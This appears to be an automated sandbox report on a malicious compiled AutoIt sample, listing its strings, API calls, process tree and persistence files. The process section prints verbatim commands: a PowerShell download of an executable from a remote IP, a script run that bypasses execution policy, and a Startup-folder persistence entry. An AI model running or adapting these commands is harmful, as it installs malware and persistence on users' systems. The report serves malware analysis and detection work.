Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2928023536.0000000000BC9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 0000000C.00000000.1918927211.0000000000319000.00000002.00000001.01000000.00000009.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B45F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF75F1D0D24
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00B74830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_002C4830
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF75F1D0A6C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1B7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00007FF75F1B7E64
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00B8D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_002DD164

System Summary

Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF75F1437B0
Source: EO3RT0fEfb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: EO3RT0fEfb.exe, 00000000.00000000.1683576822.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e5a37f4f-0
Source: EO3RT0fEfb.exe, 00000000.00000000.1683576822.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_390749a9-0
Source: EO3RT0fEfb.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f7fb8c3b-f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC054: CreateFileW,DeviceIoControl,CloseHandle,0_2_00007FF75F1BC054
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_00007FF75F1AD2C4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF75F1BD750
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00B65778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_002B5778
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00261A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00270D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00278B30 appears 42 times
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: String function: 00007FF75F168D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B11A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B20D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B28B30 appears 42 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@15/12@2/1
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C3778 GetLastError,FormatMessageW,0_2_00007FF75F1C3778
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF75F1AD5CC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1ACCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF75F1ACCE0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B58DE9 AdjustTokenPrivileges,CloseHandle,5_2_00B58DE9
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00B59399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002A8DE9 AdjustTokenPrivileges,CloseHandle,12_2_002A8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_002A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_002A9399
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1C59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF75F1C59D8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1BBE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF75F1BBE00
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1C5F2C CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF75F1C5F2C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F146580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF75F146580
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | File created: C:\Users\Public\PublicProfile.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1hflgkb.uow.ps1
Source: EO3RT0fEfb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: EO3RT0fEfb.exe | ReversingLabs: Detection: 55%
Source: EO3RT0fEfb.exe | Virustotal: Detection: 45%
Source: unknown | Process created: C:\Users\user\Desktop\EO3RT0fEfb.exe "C:\Users\user\Desktop\EO3RT0fEfb.exe"
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: EO3RT0fEfb.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: EO3RT0fEfb.exe | Static file information: File size 1083904 > 1048576
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: EO3RT0fEfb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: EO3RT0fEfb.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: EO3RT0fEfb.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: EO3RT0fEfb.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: EO3RT0fEfb.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: EO3RT0fEfb.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: EO3RT0fEfb.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1D7634 LoadLibraryA,GetProcAddress,0_2_00007FF75F1D7634
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F1778FD push rdi; ret 0_2_00007FF75F177904
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F177399 push rdi; ret 0_2_00007FF75F1773A2
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B2E93F push edi; ret 5_2_00B2E941
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B2EA58 push esi; ret 5_2_00B2EA5A
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B68A4A push FFFFFF8Bh; iretd 5_2_00B68A4C
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B1CBF1 push eax; retf 5_2_00B1CBF8
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B28B75 push ecx; ret 5_2_00B28B88
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B2EC33 push esi; ret 5_2_00B2EC35
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B2ED1C push edi; ret 5_2_00B2ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_0027E93F push edi; ret 12_2_0027E941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_002B8A4A push FFFFFF8Bh; iretd 12_2_002B8A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_0027EA58 push esi; ret 12_2_0027EA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_00278B75 push ecx; ret 12_2_00278B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_0027EC33 push esi; ret 12_2_0027EC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_0027ED1C push edi; ret 12_2_0027ED1E

Persistence and Installation Behavior

Source: C:\Users\Public\Guard.exe | File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Code function: 0_2_00007FF75F164514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF75F164514
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00B859B3
Source: C:\Users\Public\Guard.exe | Code function: 5_2_00B15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00B15EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_002D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_002D59B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 12_2_00265EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00265EDA
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00B233B7
Source: C:\Users\user\Desktop\EO3RT0fEfb.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5074Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4764Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4232Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5522Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 4232 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 5522 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF75F1BC7C0
